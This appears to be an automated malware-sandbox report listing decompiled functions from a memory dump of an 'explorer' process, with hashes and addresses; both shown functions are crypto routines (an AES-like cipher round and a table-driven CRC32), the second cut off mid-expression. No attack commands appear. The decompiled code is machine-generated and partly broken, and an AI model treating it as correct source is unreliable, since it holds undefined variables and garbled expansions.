Function 01511A1B, Relevance: .4, Instructions: 363
COMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E01511A1B(signed char* __eax, void* __ecx, char* __esi) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				unsigned int _v20;
				unsigned int _v24;
				unsigned int _v28;
				char _v32;
				signed char* _t195;
				unsigned int _t204;
				signed int _t245;
				signed int* _t335;
				unsigned int _t352;
				char _t362;
				unsigned int _t368;
				unsigned int _t377;
				unsigned int _t386;
				unsigned int _t392;
				unsigned int _t450;
				unsigned int _t473;
				char* _t489;

				_t489 = __esi;
				_t195 = __eax;
				if(__esi != 0 && __eax != 0 && __ecx != 0) {
					_v32 =  *((intOrPtr*)(__ecx + 0x200));
					_v8 = (((( *__eax & 0x000000ff) << 0x00000008 | __eax[1] & 0x000000ff) << 0x00000008 | __eax[2] & 0x000000ff) << 0x00000008 | __eax[3] & 0x000000ff) ^  *(__ecx + 0x100);
					_v24 = ((((__eax[8] & 0x000000ff) << 0x00000008 | __eax[9] & 0x000000ff) << 0x00000008 | __eax[0xa] & 0x000000ff) << 0x00000008 | __eax[0xb] & 0x000000ff) ^  *(__ecx + 0x108);
					_t352 = ((((__eax[4] & 0x000000ff) << 0x00000008 | __eax[5] & 0x000000ff) << 0x00000008 | __eax[6] & 0x000000ff) << 0x00000008 | __eax[7] & 0x000000ff) ^  *(__ecx + 0x104);
					_t450 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) << 0x00000008 | __eax[0xe] & 0x000000ff) << 0x00000008 | __eax[0xf] & 0x000000ff) ^  *(__ecx + 0x10c);
					_v16 = _t450;
					_t335 = __ecx + 0x110;
					asm("ror edi, 0x8");
					asm("ror ebx, 0x10");
					asm("ror ebx, 0x18");
					_v20 =  *(0x152b3b8 + (_t450 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v24 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_t352 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v8 >> 0x18) * 4) ^  *_t335;
					asm("ror edi, 0x10");
					asm("ror ebx, 0x8");
					asm("ror ebx, 0x18");
					_v12 =  *(0x152b3b8 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v24 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_t352 >> 0x18) * 4) ^ _t335[1];
					asm("ror edi, 0x8");
					asm("ror ebx, 0x10");
					asm("ror ebx, 0x18");
					_t473 =  *(0x152b3b8 + (_t352 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v16 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v24 >> 0x18) * 4) ^ _t335[2];
					asm("ror ebx, 0x8");
					asm("ror edx, 0x10");
					asm("ror edx, 0x18");
					_t245 =  *(0x152b3b8 + (_v24 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_t352 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v8 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v16 >> 0x18) * 4) ^ _t335[3];
					_t362 = _v32 + 0xfffffffe;
					_v16 = _t245;
					if(_t362 == 0) {
						L6:
						_t368 =  *(0x152b7b8 + (_t245 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x152b7b8 + (_t473 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x152b7b8 + (_v20 >> 0x18) * 4) & 0xff000000 ^  *(0x152b7b8 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^ _t335[4];
						 *_t489 = _t368 >> 0x18;
						 *((char*)(_t489 + 1)) = _t368 >> 0x10;
						 *(_t489 + 3) = _t368;
						 *((char*)(_t489 + 2)) = _t368 >> 8;
						_t377 =  *(0x152b7b8 + (_v20 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x152b7b8 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x152b7b8 + (_v12 >> 0x18) * 4) & 0xff000000 ^  *(0x152b7b8 + (_t473 & 0x000000ff) * 4) & 0x000000ff ^ _t335[5];
						 *((char*)(_t489 + 4)) = _t377 >> 0x18;
						 *((char*)(_t489 + 5)) = _t377 >> 0x10;
						 *((char*)(_t489 + 6)) = _t377 >> 8;
						 *(_t489 + 7) = _t377;
						_t386 =  *(0x152b7b8 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x152b7b8 + (_v20 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x152b7b8 + (_t473 >> 0x18) * 4) & 0xff000000 ^  *(0x152b7b8 + (_v16 & 0x000000ff) * 4) & 0x000000ff ^ _t335[6];
						 *((char*)(_t489 + 8)) = _t386 >> 0x18;
						 *((char*)(_t489 + 9)) = _t386 >> 0x10;
						 *(_t489 + 0xb) = _t386;
						 *((char*)(_t489 + 0xa)) = _t386 >> 8;
						_t392 =  *(0x152b7b8 + (_t473 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x152b7b8 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x152b7b8 + (_v16 >> 0x18) * 4) & 0xff000000 ^  *(0x152b7b8 + (_v20 & 0x000000ff) * 4) & 0x000000ff ^ _t335[7];
						 *((char*)(_t489 + 0xc)) = _t392 >> 0x18;
						 *((char*)(_t489 + 0xd)) = _t392 >> 0x10;
						_t204 = _t392 >> 8;
						 *(_t489 + 0xe) = _t204;
						 *(_t489 + 0xf) = _t392;
						return _t204;
					}
					_v32 = _t362;
					do {
						_v8 = _v20;
						_v28 = _v12;
						_t335 =  &(_t335[4]);
						asm("ror edx, 0x8");
						asm("ror ebx, 0x10");
						asm("ror ebx, 0x18");
						_v20 =  *(0x152b3b8 + (_t245 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_t473 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v12 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v20 >> 0x18) * 4) ^  *_t335;
						asm("ror edx, 0x10");
						asm("ror ebx, 0x8");
						asm("ror ebx, 0x18");
						_v12 =  *(0x152b3b8 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_t473 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v12 >> 0x18) * 4) ^ _t335[1];
						asm("ror edx, 0x8");
						asm("ror ebx, 0x10");
						asm("ror ebx, 0x18");
						_v24 = _t473;
						_t473 =  *(0x152b3b8 + (_v28 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v16 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_t473 >> 0x18) * 4) ^ _t335[2];
						asm("ror ebx, 0x8");
						asm("ror edx, 0x10");
						asm("ror edx, 0x18");
						_t245 =  *(0x152b3b8 + (_v24 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v28 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v8 & 0x000000ff) * 4) ^  *(0x152b3b8 + (_v16 >> 0x18) * 4) ^ _t335[3];
						_t130 =  &_v32;
						 *_t130 = _v32 - 1;
						_v16 = _t245;
					} while ( *_t130 != 0);
					goto L6;
				}
				return _t195;
			}

0x01511a1b
0x01511a1b
0x01511a23
0x01511a45
0x01511a70
0x01511ab3
0x01511ac7
0x01511ada
0x01511ae3
0x01511b00
0x01511b06
0x01511b09
0x01511b19
0x01511b33
0x01511b45
0x01511b51
0x01511b62
0x01511b85
0x01511b96
0x01511b99
0x01511baa
0x01511bbf
0x01511bda
0x01511bdd
0x01511bee
0x01511c03
0x01511c06
0x01511c09
0x01511c0c
0x01511d4e
0x01511d9a
0x01511da2
0x01511da9
0x01511dac
0x01511db4
0x01511e06
0x01511e0e
0x01511e16
0x01511e1e
0x01511e24
0x01511e73
0x01511e80
0x01511e88
0x01511e8d
0x01511e93
0x01511ede
0x01511ee7
0x01511eef
0x01511ef4
0x01511ef7
0x01511efa
0x00000000
0x01511efd
0x01511c12
0x01511c15
0x01511c1d
0x01511c23
0x01511c2d
0x01511c30
0x01511c41
0x01511c52
0x01511c6c
0x01511c7e
0x01511c8a
0x01511c9a
0x01511cb5
0x01511cc7
0x01511cd3
0x01511ce4
0x01511ce9
0x01511cf9
0x01511d19
0x01511d1c
0x01511d2d
0x01511d3f
0x01511d42
0x01511d42
0x01511d45
0x01511d45
0x00000000
0x01511c15
0x01511eff

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c0e2e72df18bb69a3f956c599aa77252de9af643920198090d3b9f5a9964c8e
Instruction ID: 9259b2b864dda8b41dffe16a0d0963cd96aa44ffccce7ec498d56edf8ee1a8e4
Opcode Fuzzy Hash: 1c0e2e72df18bb69a3f956c599aa77252de9af643920198090d3b9f5a9964c8e
Instruction Fuzzy Hash: B1E18E32A007418FD7A0DEAEDCC064DB7F3ABDA211B9EC665C6245B20FC674B516DB60

Uniqueness

Uniqueness Score: 0.00%

Function 015272C0, Relevance: .2, Instructions: 179
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E015272C0(signed int __eax, signed char __ecx, unsigned int __edx) {
				signed int _t87;
				signed int _t90;
				signed char _t175;
				unsigned int _t181;
				signed int _t207;
				unsigned int _t231;
				unsigned int _t232;

				_t175 = __ecx;
				_t232 = __edx;
				_t87 =  !__eax;
				if(__edx != 0) {
					while((_t175 & 0x00000003) != 0) {
						_t87 = _t87 >> 0x00000008 ^  *(0x1530fd0 + (( *_t175 & 0x000000ff ^ _t87) & 0x000000ff) * 4);
						_t175 = _t175 + 1;
						_t232 = _t232 - 1;
						if(_t232 != 0) {
							continue;
						}
						goto L4;
					}
				}
				L4:
				if(_t232 >= 0x20) {
					_t231 = _t232 >> 5;
					do {
						_t207 =  *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t198 & 0x000000ff) * 4) ^  *(_t175 + 0x10)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 